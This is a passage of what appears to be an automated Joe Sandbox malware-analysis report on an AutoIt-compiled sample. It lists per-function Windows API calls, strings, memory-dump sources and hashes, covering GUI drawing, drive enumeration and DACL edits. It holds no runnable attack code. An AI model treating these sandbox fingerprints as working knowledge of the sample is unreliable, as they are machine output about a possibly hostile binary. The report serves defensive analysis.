                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00612DA1
                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612DA8
                                                  • GlobalFree.KERNEL32(00000000), ref: 00612DB3
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612DC5
                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0062FC38,00000000), ref: 00612DDB
                                                  • GlobalFree.KERNEL32(00000000), ref: 00612DEB
                                                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00612E11
                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00612E30
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612E52
                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061303F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                  • API String ID: 2211948467-2373415609
                                                  • Opcode ID: 8d901bec62d91785549e2b483165a18760ae526cb328eeebd04c66268ed0a970
                                                  • Instruction ID: 5c9d8329e41d9ef0b2f10d25180044c07a71c00d132b039c9ed75baf9540153c
                                                  • Opcode Fuzzy Hash: 8d901bec62d91785549e2b483165a18760ae526cb328eeebd04c66268ed0a970
                                                  • Instruction Fuzzy Hash: B7027C71900615EFDB24DF64CD89EAE7BBAFF49320F048158F915AB2A1DB70AD41CB60
                                                  Function 006270D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetTextColor.GDI32(?,00000000), ref: 0062712F
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00627160
                                                  • GetSysColor.USER32(0000000F), ref: 0062716C
                                                  • SetBkColor.GDI32(?,000000FF), ref: 00627186
                                                  • SelectObject.GDI32(?,?), ref: 00627195
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 006271C0
                                                  • GetSysColor.USER32(00000010), ref: 006271C8
                                                  • CreateSolidBrush.GDI32(00000000), ref: 006271CF
                                                  • FrameRect.USER32(?,?,00000000), ref: 006271DE
                                                  • DeleteObject.GDI32(00000000), ref: 006271E5
                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00627230
                                                  • FillRect.USER32(?,?,?), ref: 00627262
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00627284
                                                    • Part of subcall function 006273E8: GetSysColor.USER32(00000012), ref: 00627421
                                                    • Part of subcall function 006273E8: SetTextColor.GDI32(?,?), ref: 00627425
                                                    • Part of subcall function 006273E8: GetSysColorBrush.USER32(0000000F), ref: 0062743B
                                                    • Part of subcall function 006273E8: GetSysColor.USER32(0000000F), ref: 00627446
                                                    • Part of subcall function 006273E8: GetSysColor.USER32(00000011), ref: 00627463
                                                    • Part of subcall function 006273E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00627471
                                                    • Part of subcall function 006273E8: SelectObject.GDI32(?,00000000), ref: 00627482
                                                    • Part of subcall function 006273E8: SetBkColor.GDI32(?,00000000), ref: 0062748B
                                                    • Part of subcall function 006273E8: SelectObject.GDI32(?,?), ref: 00627498
                                                    • Part of subcall function 006273E8: InflateRect.USER32(?,000000FF,000000FF), ref: 006274B7
                                                    • Part of subcall function 006273E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006274CE
                                                    • Part of subcall function 006273E8: GetWindowLongW.USER32(00000000,000000F0), ref: 006274DB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                  • String ID:
                                                  • API String ID: 4124339563-0
                                                  • Opcode ID: 11cf06dcc067598dac3ca2f9d410fc075a2e77fa3a0b60a1fd60a9ffc1e4babe
                                                  • Instruction ID: 96bbeaa7704b07da6083ba90a2d713d0b04564de6f665de760c77d62ba981882
                                                  • Opcode Fuzzy Hash: 11cf06dcc067598dac3ca2f9d410fc075a2e77fa3a0b60a1fd60a9ffc1e4babe
                                                  • Instruction Fuzzy Hash: 99A1BF72008B11AFD7209F64DC48E5E7BAAFF49330F101A19F962A61E0D771E956CF52
                                                  Function 005A8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(?,?), ref: 005A8E14
                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 005E6AC5
                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 005E6AFE
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 005E6F43
                                                    • Part of subcall function 005A8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005A8BE8,?,00000000,?,?,?,?,005A8BBA,00000000,?), ref: 005A8FC5
                                                  • SendMessageW.USER32(?,00001053), ref: 005E6F7F
                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 005E6F96
                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 005E6FAC
                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 005E6FB7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                  • String ID: 0
                                                  • API String ID: 2760611726-4108050209
                                                  • Opcode ID: 432fa6f82aa50c9b0a14e937475a22ada1ac43aeb0fae333b6d1e8b3febcb3ba
                                                  • Instruction ID: ff601d941db018b4529de4a8a9d9dc00996729bad67341e54eeffd3809696c0d
                                                  • Opcode Fuzzy Hash: 432fa6f82aa50c9b0a14e937475a22ada1ac43aeb0fae333b6d1e8b3febcb3ba
                                                  • Instruction Fuzzy Hash: 1112AF30200681DFD729CF15C858BBABFEAFB65390F184569E4998B261CB31EC52CF51
                                                  Function 00612711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(00000000), ref: 0061273E
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0061286A
                                                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 006128A9
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 006128B9
                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00612900
                                                  • GetClientRect.USER32(00000000,?), ref: 0061290C
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00612955
                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00612964
                                                  • GetStockObject.GDI32(00000011), ref: 00612974
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00612978
                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00612988
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00612991
                                                  • DeleteDC.GDI32(00000000), ref: 0061299A
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006129C6
                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 006129DD
                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00612A1D
                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00612A31
                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00612A42
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00612A77
                                                  • GetStockObject.GDI32(00000011), ref: 00612A82
                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00612A8D
                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00612A97
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                  • API String ID: 2910397461-517079104
                                                  • Opcode ID: a9b89cdb6176f2fcf67d94cbd59b0d9d925ba31d893bbdea3b0554006ea72fbb
                                                  • Instruction ID: 900a16bc82137f15c4af8547cf096d939c7d2ae0427a59a9b7845e33138afa87
                                                  • Opcode Fuzzy Hash: a9b89cdb6176f2fcf67d94cbd59b0d9d925ba31d893bbdea3b0554006ea72fbb
                                                  • Instruction Fuzzy Hash: 83B16D71A00615AFEB24DF68DC4AEAE7BAAFB49710F044115F915EB2A0D770ED40CB94
                                                  Function 00604ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00604AED
                                                  • GetDriveTypeW.KERNEL32(?,0062CB68,?,\\.\,0062CC08), ref: 00604BCA
                                                  • SetErrorMode.KERNEL32(00000000,0062CB68,?,\\.\,0062CC08), ref: 00604D36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DriveType
                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                  • API String ID: 2907320926-4222207086
                                                  • Opcode ID: f739ada4d4921bb57186795b1ae2c770c64578fa85103e9ec689df9db0c48b8a
                                                  • Instruction ID: 4c35ffa207cb9fa44e1e68043d5dfb4903a04b755bf79fa2c693af108a380d8d
                                                  • Opcode Fuzzy Hash: f739ada4d4921bb57186795b1ae2c770c64578fa85103e9ec689df9db0c48b8a
                                                  • Instruction Fuzzy Hash: 0461D0B02C2106EBDB28DF14CA869AE7BB3AF44301F644515FA06AB2D1DF31DD46DB41
                                                  Function 006273E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSysColor.USER32(00000012), ref: 00627421
                                                  • SetTextColor.GDI32(?,?), ref: 00627425
                                                  • GetSysColorBrush.USER32(0000000F), ref: 0062743B
                                                  • GetSysColor.USER32(0000000F), ref: 00627446
                                                  • CreateSolidBrush.GDI32(?), ref: 0062744B
                                                  • GetSysColor.USER32(00000011), ref: 00627463
                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00627471
                                                  • SelectObject.GDI32(?,00000000), ref: 00627482
                                                  • SetBkColor.GDI32(?,00000000), ref: 0062748B
                                                  • SelectObject.GDI32(?,?), ref: 00627498
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 006274B7
                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006274CE
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 006274DB
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0062752A
                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00627554
                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00627572
                                                  • DrawFocusRect.USER32(?,?), ref: 0062757D
                                                  • GetSysColor.USER32(00000011), ref: 0062758E
                                                  • SetTextColor.GDI32(?,00000000), ref: 00627596
                                                  • DrawTextW.USER32(?,006270F5,000000FF,?,00000000), ref: 006275A8
                                                  • SelectObject.GDI32(?,?), ref: 006275BF
                                                  • DeleteObject.GDI32(?), ref: 006275CA
                                                  • SelectObject.GDI32(?,?), ref: 006275D0
                                                  • DeleteObject.GDI32(?), ref: 006275D5
                                                  • SetTextColor.GDI32(?,?), ref: 006275DB
                                                  • SetBkColor.GDI32(?,?), ref: 006275E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 1996641542-0
                                                  • Opcode ID: e3013951188191bc2aad14d37a51956ed021aa6e3a048d662209a1962a9da4ad
                                                  • Instruction ID: 43610fd65f9191adc2d5c82e50f8dd933e519b8166eb4c92a5e39584270e6240
                                                  • Opcode Fuzzy Hash: e3013951188191bc2aad14d37a51956ed021aa6e3a048d662209a1962a9da4ad
                                                  • Instruction Fuzzy Hash: B7617C72900A28AFDB109FA4DC49EEEBFBAEF09320F105111F911BB2A1D7709951DF90
                                                  Function 00620FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00621128
                                                  • GetDesktopWindow.USER32 ref: 0062113D
                                                  • GetWindowRect.USER32(00000000), ref: 00621144
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00621199
                                                  • DestroyWindow.USER32(?), ref: 006211B9
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006211ED
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0062120B
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0062121D
                                                  • SendMessageW.USER32(00000000,00000421,?,?), ref: 00621232
                                                  • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00621245
                                                  • IsWindowVisible.USER32(00000000), ref: 006212A1
                                                  • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 006212BC
                                                  • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 006212D0
                                                  • GetWindowRect.USER32(00000000,?), ref: 006212E8
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 0062130E
                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00621328
                                                  • CopyRect.USER32(?,?), ref: 0062133F
                                                  • SendMessageW.USER32(00000000,00000412,00000000), ref: 006213AA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                  • String ID: ($0$tooltips_class32
                                                  • API String ID: 698492251-4156429822
                                                  • Opcode ID: 69c5ed0f08bc7dd3f29d28d5cf4c1c0b70fd2a45f126bf2168762b11d903a7f0
                                                  • Instruction ID: e1b00e2a59a4f4aa97fe443e3313554ddf3e255c9e36594d7f01d6cd2f179f5a
                                                  • Opcode Fuzzy Hash: 69c5ed0f08bc7dd3f29d28d5cf4c1c0b70fd2a45f126bf2168762b11d903a7f0
                                                  • Instruction Fuzzy Hash: 9DB19D71608751AFDB10DF24D888BAEBBE6FF99350F008918F9999B261CB31D845CF91
                                                  Function 005A8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005A8968
                                                  • GetSystemMetrics.USER32(00000007), ref: 005A8970
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005A899B
                                                  • GetSystemMetrics.USER32(00000008), ref: 005A89A3
                                                  • GetSystemMetrics.USER32(00000004), ref: 005A89C8
                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005A89E5
                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 005A89F5
                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 005A8A28
                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 005A8A3C
                                                  • GetClientRect.USER32(00000000,000000FF), ref: 005A8A5A
                                                  • GetStockObject.GDI32(00000011), ref: 005A8A76
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 005A8A81
                                                    • Part of subcall function 005A912D: GetCursorPos.USER32(?), ref: 005A9141
                                                    • Part of subcall function 005A912D: ScreenToClient.USER32(00000000,?), ref: 005A915E
                                                    • Part of subcall function 005A912D: GetAsyncKeyState.USER32(00000001), ref: 005A9183
                                                    • Part of subcall function 005A912D: GetAsyncKeyState.USER32(00000002), ref: 005A919D
                                                  • SetTimer.USER32(00000000,00000000,00000028,005A90FC), ref: 005A8AA8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                  • String ID: AutoIt v3 GUI
                                                  • API String ID: 1458621304-248962490
                                                  • Opcode ID: 1e358c90a473c7d783b78e0a534d42a32c3307be30309d3efac07892e39716ba
                                                  • Instruction ID: f3afa1aa87ab527282bbea4d446022e0b505cb268354058b50ae4f33bffe86d0
                                                  • Opcode Fuzzy Hash: 1e358c90a473c7d783b78e0a534d42a32c3307be30309d3efac07892e39716ba
                                                  • Instruction Fuzzy Hash: 53B15D71A0020A9FDB14DFA8CC49BAE3BB6FB49354F144229FA15EB290DB74E851CB51
                                                  Function 005F0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005F10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 005F1114
                                                    • Part of subcall function 005F10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1120
                                                    • Part of subcall function 005F10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F112F
                                                    • Part of subcall function 005F10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1136
                                                    • Part of subcall function 005F10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 005F114D
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 005F0DF5
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005F0E29
                                                  • GetLengthSid.ADVAPI32(?), ref: 005F0E40
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 005F0E7A
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005F0E96
                                                  • GetLengthSid.ADVAPI32(?), ref: 005F0EAD
                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 005F0EB5
                                                  • HeapAlloc.KERNEL32(00000000), ref: 005F0EBC
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 005F0EDD
                                                  • CopySid.ADVAPI32(00000000), ref: 005F0EE4
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 005F0F13
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005F0F35
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 005F0F47
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0F6E
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0F75
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0F7E
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0F85
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0F8E
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0F95
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 005F0FA1
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0FA8
                                                    • Part of subcall function 005F1193: GetProcessHeap.KERNEL32(00000008,005F0BB1,?,00000000,?,005F0BB1,?), ref: 005F11A1
                                                    • Part of subcall function 005F1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,005F0BB1,?), ref: 005F11A8
                                                    • Part of subcall function 005F1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,005F0BB1,?), ref: 005F11B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                  • String ID:
